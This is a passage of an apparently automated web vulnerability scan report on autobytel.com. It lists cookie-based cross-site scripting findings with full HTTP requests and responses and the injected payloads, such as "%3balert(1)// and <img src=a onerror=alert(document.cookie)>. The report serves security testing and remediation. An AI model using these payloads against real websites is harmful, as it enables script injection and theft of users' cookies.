Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:31:47 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:31:47 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:31:46 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:31:46 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 36634


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<img src=a onerror=alert(document.cookie)>f067754e5c47e558";alert(1)//8c064b049ab";
           
           
           //Zane 2/11/10 - Recently Viewed
           
           
                       //Paul Koch 3/17/08 - add cpcID
           
       
           //Paul Koch 1/25/08 - add page request UUID
           s.prop40 = "47AE7DAC-DDB9-8AA1-FC92B024
...[SNIP]...

4.2038. http://www.autobytel.com/content/home/help/index.cfm/action/contact [ENTERED_POSTAL_CODE_VCH cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /content/home/help/index.cfm/action/contact

Issue detail

The value of the ENTERED_POSTAL_CODE_VCH cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 475cb"%3balert(1)//29f7f8885d8 was submitted in the ENTERED_POSTAL_CODE_VCH cookie. This input was echoed as 475cb";alert(1)//29f7f8885d8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/home/help/index.cfm/action/contact HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=475cb"%3balert(1)//29f7f8885d8; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Content-Length: 36634
Expires: Mon, 24 Jan 2011 23:35:49 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:35:49 GMT
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:35:49 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:35:49 GMT;path=/
Set-Cookie: PV_CT=3;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
;
           //s.prop7 = "help|";
           
           //s.prop9 = "help|Search Engine Optimization Project|13148";
           s.prop10 = "help|";
           s.prop11 = "Search Engine Optimization Project|13148|ABTL";
           s.prop12 = "475cb";alert(1)//29f7f8885d8||";
           
           s.prop14 = "home|help|contact : Search Engine Optimization Project entry page";
           s.prop15 = "|No Article";
           s.prop16 = "";
           s.prop17 = "";
           s.prop20 = "help||||sky|ban|Search
...[SNIP]...

4.2039. http://www.autobytel.com/content/home/help/index.cfm/action/contact [PV_CT cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /content/home/help/index.cfm/action/contact

Issue detail

The value of the PV_CT cookie is copied into the HTML document as plain text between tags. The payload 7f46e<img%20src%3da%20onerror%3dalert(1)>c81dcfa2ffc was submitted in the PV_CT cookie. This input was echoed as 7f46e<img src=a onerror=alert(1)>c81dcfa2ffc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /content/home/help/index.cfm/action/contact HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=27f46e<img%20src%3da%20onerror%3dalert(1)>c81dcfa2ffc; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 500 Internal Server Error
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
server-error: true
Content-Length: 44352
Vary: Accept-Encoding
Expires: Mon, 24 Jan 2011 23:34:40 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:34:40 GMT
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:34:39 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:34:39 GMT;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<h1 id="textSection1" style="COLOR: black; FONT: 13pt/15pt verdana">
The value 27f46e<img src=a onerror=alert(1)>c81dcfa2ffc cannot be converted to a number.
</h1>
...[SNIP]...

4.2040. http://www.autobytel.com/content/home/help/index.cfm/action/privacy [BDATALIST cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /content/home/help/index.cfm/action/privacy

Issue detail

The value of the BDATALIST cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 843c9"%3balert(1)//e157ea299fe was submitted in the BDATALIST cookie. This input was echoed as 843c9";alert(1)//e157ea299fe in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/home/help/index.cfm/action/privacy HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4843c9"%3balert(1)//e157ea299fe; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:39:49 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:39:49 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:39:49 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:39:49 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 55345


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<img src=a onerror=alert(document.cookie)>f067754e5c4843c9";alert(1)//e157ea299fe";
           
           
           //Zane 2/11/10 - Recently Viewed
           
           
                       //Paul Koch 3/17/08 - add cpcID
           
       
           //Paul Koch 1/25/08 - add page request UUID
           s.prop40 = "47F81EC9-D609-4F14-9238B82F
...[SNIP]...

4.2041. http://www.autobytel.com/content/home/help/index.cfm/action/privacy [ENTERED_POSTAL_CODE_VCH cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /content/home/help/index.cfm/action/privacy

Issue detail

The value of the ENTERED_POSTAL_CODE_VCH cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5b24b"%3balert(1)//162a2e92347 was submitted in the ENTERED_POSTAL_CODE_VCH cookie. This input was echoed as 5b24b";alert(1)//162a2e92347 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/home/help/index.cfm/action/privacy HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=5b24b"%3balert(1)//162a2e92347; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Content-Length: 55345
Expires: Mon, 24 Jan 2011 23:47:55 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:47:55 GMT
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:47:54 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:47:54 GMT;path=/
Set-Cookie: PV_CT=3;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
;
           //s.prop7 = "help|";
           
           //s.prop9 = "help|Search Engine Optimization Project|13148";
           s.prop10 = "help|";
           s.prop11 = "Search Engine Optimization Project|13148|ABTL";
           s.prop12 = "5b24b";alert(1)//162a2e92347||";
           
           s.prop14 = "home|help|privacy : Search Engine Optimization Project entry page";
           s.prop15 = "|No Article";
           s.prop16 = "";
           s.prop17 = "";
           s.prop20 = "help||||sky|ban|Search
...[SNIP]...

4.2042. http://www.autobytel.com/content/home/help/index.cfm/action/privacy [PV_CT cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /content/home/help/index.cfm/action/privacy

Issue detail

The value of the PV_CT cookie is copied into the HTML document as plain text between tags. The payload 47ac3<img%20src%3da%20onerror%3dalert(1)>c8905b9d6f3 was submitted in the PV_CT cookie. This input was echoed as 47ac3<img src=a onerror=alert(1)>c8905b9d6f3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /content/home/help/index.cfm/action/privacy HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=247ac3<img%20src%3da%20onerror%3dalert(1)>c8905b9d6f3; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 500 Internal Server Error
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
server-error: true
Content-Length: 63064
Vary: Accept-Encoding
Expires: Mon, 24 Jan 2011 23:42:32 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:42:32 GMT
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:42:32 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:42:32 GMT;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<h1 id="textSection1" style="COLOR: black; FONT: 13pt/15pt verdana">
The value 247ac3<img src=a onerror=alert(1)>c8905b9d6f3 cannot be converted to a number.
</h1>
...[SNIP]...

4.2043. http://www.autobytel.com/content/home/help/index.cfm/action/terms [BDATALIST cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /content/home/help/index.cfm/action/terms

Issue detail

The value of the BDATALIST cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1dc34"%3balert(1)//4bbdb493743 was submitted in the BDATALIST cookie. This input was echoed as 1dc34";alert(1)//4bbdb493743 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/home/help/index.cfm/action/terms HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c41dc34"%3balert(1)//4bbdb493743; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Content-Length: 54707
Expires: Mon, 24 Jan 2011 23:36:21 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:36:21 GMT
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:36:20 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:36:20 GMT;path=/
Set-Cookie: PV_CT=3;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<img src=a onerror=alert(document.cookie)>f067754e5c41dc34";alert(1)//4bbdb493743";
           
           
           //Zane 2/11/10 - Recently Viewed
           
           
                       //Paul Koch 3/17/08 - add cpcID
           
       
           //Paul Koch 1/25/08 - add page request UUID
           s.prop40 = "47D851FD-E0AA-F64F-2E249AFF
...[SNIP]...

4.2044. http://www.autobytel.com/content/home/help/index.cfm/action/terms [ENTERED_POSTAL_CODE_VCH cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /content/home/help/index.cfm/action/terms

Issue detail

The value of the ENTERED_POSTAL_CODE_VCH cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c0310"%3balert(1)//caca1cfb7f6 was submitted in the ENTERED_POSTAL_CODE_VCH cookie. This input was echoed as c0310";alert(1)//caca1cfb7f6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/home/help/index.cfm/action/terms HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=c0310"%3balert(1)//caca1cfb7f6; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:38:14 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:38:14 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:38:13 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:38:13 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 54707


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
;
           //s.prop7 = "help|";
           
           //s.prop9 = "help|Search Engine Optimization Project|13148";
           s.prop10 = "help|";
           s.prop11 = "Search Engine Optimization Project|13148|ABTL";
           s.prop12 = "c0310";alert(1)//caca1cfb7f6||";
           
           s.prop14 = "home|help|terms : Search Engine Optimization Project entry page";
           s.prop15 = "|No Article";
           s.prop16 = "";
           s.prop17 = "";
           s.prop20 = "help||||sky|ban|Search En
...[SNIP]...

4.2045. http://www.autobytel.com/content/home/help/index.cfm/action/terms [PV_CT cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /content/home/help/index.cfm/action/terms

Issue detail

The value of the PV_CT cookie is copied into the HTML document as plain text between tags. The payload 60e75<img%20src%3da%20onerror%3dalert(1)>6e38586f4bb was submitted in the PV_CT cookie. This input was echoed as 60e75<img src=a onerror=alert(1)>6e38586f4bb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /content/home/help/index.cfm/action/terms HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=260e75<img%20src%3da%20onerror%3dalert(1)>6e38586f4bb; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 500 Internal Server Error
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
server-error: true
Content-Length: 62426
Vary: Accept-Encoding
Expires: Mon, 24 Jan 2011 23:37:09 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:37:09 GMT
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:37:09 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:37:09 GMT;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<h1 id="textSection1" style="COLOR: black; FONT: 13pt/15pt verdana">
The value 260e75<img src=a onerror=alert(1)>6e38586f4bb cannot be converted to a number.
</h1>
...[SNIP]...

4.2046. http://www.autobytel.com/content/home/index.cfm [BDATALIST cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /content/home/index.cfm

Issue detail

The value of the BDATALIST cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 599a6"%3balert(1)//afa2457dd78 was submitted in the BDATALIST cookie. This input was echoed as 599a6";alert(1)//afa2457dd78 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/home/index.cfm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4599a6"%3balert(1)//afa2457dd78; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:39:47 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:39:47 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:39:46 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 70738


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<img src=a onerror=alert(document.cookie)>f067754e5c4599a6";alert(1)//afa2457dd78";
